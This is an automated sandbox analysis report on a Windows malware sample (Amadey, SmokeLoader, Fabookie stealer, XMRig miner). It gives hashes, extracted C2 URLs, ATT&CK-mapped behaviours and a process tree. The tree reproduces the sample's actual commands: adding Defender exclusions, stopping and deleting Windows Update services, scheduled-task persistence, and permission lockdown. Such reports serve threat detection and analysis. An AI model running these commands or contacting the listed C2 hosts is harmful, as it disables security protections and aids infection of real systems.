amadey | 450714f2a4886ae2ca59f8b7fb7e97a1b4c6fa6f015aa8a3d5deb4e05920e8a2

Analysis

max time kernel
152s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
14/06/2023, 21:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.8MB
MD5

d1148e3d96e945249049366cb68352a1
SHA1

2650dd7a58154b2f56ce01431d7d3c44b34c283d
SHA256

450714f2a4886ae2ca59f8b7fb7e97a1b4c6fa6f015aa8a3d5deb4e05920e8a2
SHA512

880cedcb024f9a22b4d0f4db42911626a5abadaba639db05c89561a83ddbefbfcd7dfb4ad4d373271c6187dc3beafedeb42d759fdd74ff120935a1b1ab1fe3d5
SSDEEP

49152:N3DoAWWMlfRTvHrq5jZFE0XwQtcbNn9+XvHzSG:GA2fRTvrq9ZPXXubRMXrSG

Score

10^/10

amadey fabookie smokeloader xmrig pub5 backdoor evasion miner spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

3.83

45.9.74.80/0bjdn2Z/index.php

Extracted

Family

smokeloader

Botnet

pub5

Extracted

Family

smokeloader

Version

2022

http://aapu.at/tmp/

http://poudineh.com/tmp/

http://firsttrusteedrx.ru/tmp/

http://kingpirate.ru/tmp/

rc4.i32

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral2/memory/3380-180-0x0000000002BB0000-0x0000000002CE1000-memory.dmp	family_fabookie
behavioral2/memory/3380-206-0x0000000002BB0000-0x0000000002CE1000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 2628 created 1920	2628	XandETC.exe	56
PID 2628 created 1920	2628	XandETC.exe	56
PID 2628 created 1920	2628	XandETC.exe	56
PID 2628 created 1920	2628	XandETC.exe	56
PID 2628 created 1920	2628	XandETC.exe	56
PID 1812 created 1920	1812	updater.exe	56
PID 1812 created 1920	1812	updater.exe	56
PID 1812 created 1920	1812	updater.exe	56
PID 1812 created 1920	1812	updater.exe	56
PID 1812 created 1920	1812	updater.exe	56
PID 2124 created 1920	2124	conhost.exe	56
PID 1812 created 1920	1812	updater.exe	56
PID 1812 created 1920	1812	updater.exe	56

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral2/memory/4144-331-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	xmrig
behavioral2/memory/4144-334-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	xmrig
behavioral2/memory/4144-335-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	xmrig
behavioral2/memory/4144-337-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	xmrig
behavioral2/memory/4144-340-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	xmrig
behavioral2/memory/4144-343-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	xmrig

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	file.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	newplayer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	oneetx.exe

Executes dropped EXE 9 IoCs

pid	Process
3380	ss41.exe
3076	2a344302.exe
3880	newplayer.exe
3280	oneetx.exe
2628	XandETC.exe
4492	oneetx.exe
1812	updater.exe
1684	oneetx.exe
3852	oneetx.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4144-331-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	upx
behavioral2/memory/4144-334-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	upx
behavioral2/memory/4144-335-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	upx
behavioral2/memory/4144-337-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	upx
behavioral2/memory/4144-340-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	upx
behavioral2/memory/4144-343-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1812 set thread context of 2124	1812	updater.exe	159
PID 1812 set thread context of 4144	1812	updater.exe	165

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4564	sc.exe
4908	sc.exe
3184	sc.exe
2124	sc.exe
1664	sc.exe
1148	sc.exe
1572	sc.exe
716	sc.exe
1952	sc.exe
2476	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2a344302.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2a344302.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2a344302.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4520	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1504	WMIC.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3532	taskkill.exe
4468	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3076	2a344302.exe
3076	2a344302.exe
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE
1920	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1920	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3076	2a344302.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4468	taskkill.exe
Token: SeDebugPrivilege	3532	taskkill.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeShutdownPrivilege	4036	powercfg.exe
Token: SeCreatePagefilePrivilege	4036	powercfg.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeShutdownPrivilege	1588	powercfg.exe
Token: SeCreatePagefilePrivilege	1588	powercfg.exe
Token: SeShutdownPrivilege	1488	powercfg.exe
Token: SeCreatePagefilePrivilege	1488	powercfg.exe
Token: SeShutdownPrivilege	4280	powercfg.exe
Token: SeCreatePagefilePrivilege	4280	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1800	powershell.exe
Token: SeSecurityPrivilege	1800	powershell.exe
Token: SeTakeOwnershipPrivilege	1800	powershell.exe
Token: SeLoadDriverPrivilege	1800	powershell.exe
Token: SeSystemProfilePrivilege	1800	powershell.exe
Token: SeSystemtimePrivilege	1800	powershell.exe
Token: SeProfSingleProcessPrivilege	1800	powershell.exe
Token: SeIncBasePriorityPrivilege	1800	powershell.exe
Token: SeCreatePagefilePrivilege	1800	powershell.exe
Token: SeBackupPrivilege	1800	powershell.exe
Token: SeRestorePrivilege	1800	powershell.exe
Token: SeShutdownPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeSystemEnvironmentPrivilege	1800	powershell.exe
Token: SeRemoteShutdownPrivilege	1800	powershell.exe
Token: SeUndockPrivilege	1800	powershell.exe
Token: SeManageVolumePrivilege	1800	powershell.exe
Token: 33	1800	powershell.exe
Token: 34	1800	powershell.exe
Token: 35	1800	powershell.exe
Token: 36	1800	powershell.exe
Token: SeIncreaseQuotaPrivilege	1800	powershell.exe
Token: SeSecurityPrivilege	1800	powershell.exe
Token: SeTakeOwnershipPrivilege	1800	powershell.exe
Token: SeLoadDriverPrivilege	1800	powershell.exe
Token: SeSystemProfilePrivilege	1800	powershell.exe
Token: SeSystemtimePrivilege	1800	powershell.exe
Token: SeProfSingleProcessPrivilege	1800	powershell.exe
Token: SeIncBasePriorityPrivilege	1800	powershell.exe
Token: SeCreatePagefilePrivilege	1800	powershell.exe
Token: SeBackupPrivilege	1800	powershell.exe
Token: SeRestorePrivilege	1800	powershell.exe
Token: SeShutdownPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeSystemEnvironmentPrivilege	1800	powershell.exe
Token: SeRemoteShutdownPrivilege	1800	powershell.exe
Token: SeUndockPrivilege	1800	powershell.exe
Token: SeManageVolumePrivilege	1800	powershell.exe
Token: 33	1800	powershell.exe
Token: 34	1800	powershell.exe
Token: 35	1800	powershell.exe
Token: 36	1800	powershell.exe
Token: SeIncreaseQuotaPrivilege	1800	powershell.exe
Token: SeSecurityPrivilege	1800	powershell.exe
Token: SeTakeOwnershipPrivilege	1800	powershell.exe
Token: SeLoadDriverPrivilege	1800	powershell.exe
Token: SeSystemProfilePrivilege	1800	powershell.exe
Token: SeSystemtimePrivilege	1800	powershell.exe
Token: SeProfSingleProcessPrivilege	1800	powershell.exe
Token: SeIncBasePriorityPrivilege	1800	powershell.exe
Token: SeCreatePagefilePrivilege	1800	powershell.exe
Token: SeBackupPrivilege	1800	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3880	newplayer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3948 wrote to memory of 3380	3948	file.exe	83
PID 3948 wrote to memory of 3380	3948	file.exe	83
PID 3948 wrote to memory of 3076	3948	file.exe	84
PID 3948 wrote to memory of 3076	3948	file.exe	84
PID 3948 wrote to memory of 3076	3948	file.exe	84
PID 3948 wrote to memory of 3880	3948	file.exe	85
PID 3948 wrote to memory of 3880	3948	file.exe	85
PID 3948 wrote to memory of 3880	3948	file.exe	85
PID 3380 wrote to memory of 3532	3380	ss41.exe	86
PID 3380 wrote to memory of 3532	3380	ss41.exe	86
PID 3380 wrote to memory of 4468	3380	ss41.exe	87
PID 3380 wrote to memory of 4468	3380	ss41.exe	87
PID 3880 wrote to memory of 3280	3880	newplayer.exe	89
PID 3880 wrote to memory of 3280	3880	newplayer.exe	89
PID 3880 wrote to memory of 3280	3880	newplayer.exe	89
PID 3280 wrote to memory of 4520	3280	oneetx.exe	91
PID 3280 wrote to memory of 4520	3280	oneetx.exe	91
PID 3280 wrote to memory of 4520	3280	oneetx.exe	91
PID 3280 wrote to memory of 3656	3280	oneetx.exe	93
PID 3280 wrote to memory of 3656	3280	oneetx.exe	93
PID 3280 wrote to memory of 3656	3280	oneetx.exe	93
PID 3656 wrote to memory of 4204	3656	cmd.exe	95
PID 3656 wrote to memory of 4204	3656	cmd.exe	95
PID 3656 wrote to memory of 4204	3656	cmd.exe	95
PID 3656 wrote to memory of 1216	3656	cmd.exe	96
PID 3656 wrote to memory of 1216	3656	cmd.exe	96
PID 3656 wrote to memory of 1216	3656	cmd.exe	96
PID 3656 wrote to memory of 1884	3656	cmd.exe	97
PID 3656 wrote to memory of 1884	3656	cmd.exe	97
PID 3656 wrote to memory of 1884	3656	cmd.exe	97
PID 3656 wrote to memory of 3968	3656	cmd.exe	98
PID 3656 wrote to memory of 3968	3656	cmd.exe	98
PID 3656 wrote to memory of 3968	3656	cmd.exe	98
PID 3656 wrote to memory of 1416	3656	cmd.exe	99
PID 3656 wrote to memory of 1416	3656	cmd.exe	99
PID 3656 wrote to memory of 1416	3656	cmd.exe	99
PID 3656 wrote to memory of 4836	3656	cmd.exe	100
PID 3656 wrote to memory of 4836	3656	cmd.exe	100
PID 3656 wrote to memory of 4836	3656	cmd.exe	100
PID 3280 wrote to memory of 2628	3280	oneetx.exe	101
PID 3280 wrote to memory of 2628	3280	oneetx.exe	101
PID 1564 wrote to memory of 2124	1564	cmd.exe	118
PID 1564 wrote to memory of 2124	1564	cmd.exe	118
PID 4440 wrote to memory of 4036	4440	cmd.exe	119
PID 4440 wrote to memory of 4036	4440	cmd.exe	119
PID 1564 wrote to memory of 1952	1564	cmd.exe	120
PID 1564 wrote to memory of 1952	1564	cmd.exe	120
PID 4440 wrote to memory of 1588	4440	cmd.exe	121
PID 4440 wrote to memory of 1588	4440	cmd.exe	121
PID 4440 wrote to memory of 1488	4440	cmd.exe	122
PID 4440 wrote to memory of 1488	4440	cmd.exe	122
PID 1564 wrote to memory of 2476	1564	cmd.exe	123
PID 1564 wrote to memory of 2476	1564	cmd.exe	123
PID 1564 wrote to memory of 1664	1564	cmd.exe	124
PID 1564 wrote to memory of 1664	1564	cmd.exe	124
PID 4440 wrote to memory of 4280	4440	cmd.exe	125
PID 4440 wrote to memory of 4280	4440	cmd.exe	125
PID 1564 wrote to memory of 1148	1564	cmd.exe	126
PID 1564 wrote to memory of 1148	1564	cmd.exe	126
PID 1564 wrote to memory of 4032	1564	cmd.exe	127
PID 1564 wrote to memory of 4032	1564	cmd.exe	127
PID 1564 wrote to memory of 3168	1564	cmd.exe	128
PID 1564 wrote to memory of 3168	1564	cmd.exe	128
PID 1564 wrote to memory of 4044	1564	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1920
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "C:\Users\Admin\AppData\Local\Temp\file.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3948
- - C:\Users\Admin\AppData\Local\Temp\ss41.exe
    "C:\Users\Admin\AppData\Local\Temp\ss41.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3380
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /IM chrome.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3532
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /IM msedge.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4468
- - C:\Users\Admin\AppData\Local\Temp\2a344302.exe
    "C:\Users\Admin\AppData\Local\Temp\2a344302.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:3076
- - C:\Users\Admin\AppData\Local\Temp\newplayer.exe
    "C:\Users\Admin\AppData\Local\Temp\newplayer.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3880
  - - C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
      "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3280
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:4520
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3656
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:4204
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        6⤵
        
        PID:1216
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        6⤵
        
        PID:1884
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:3968
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:N"
        6⤵
        
        PID:1416
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:R" /E
        6⤵
        
        PID:4836
    - - C:\Users\Admin\AppData\Local\Temp\1000020001\XandETC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000020001\XandETC.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:2628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1356
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2124
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1952
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2476
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1664
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1148
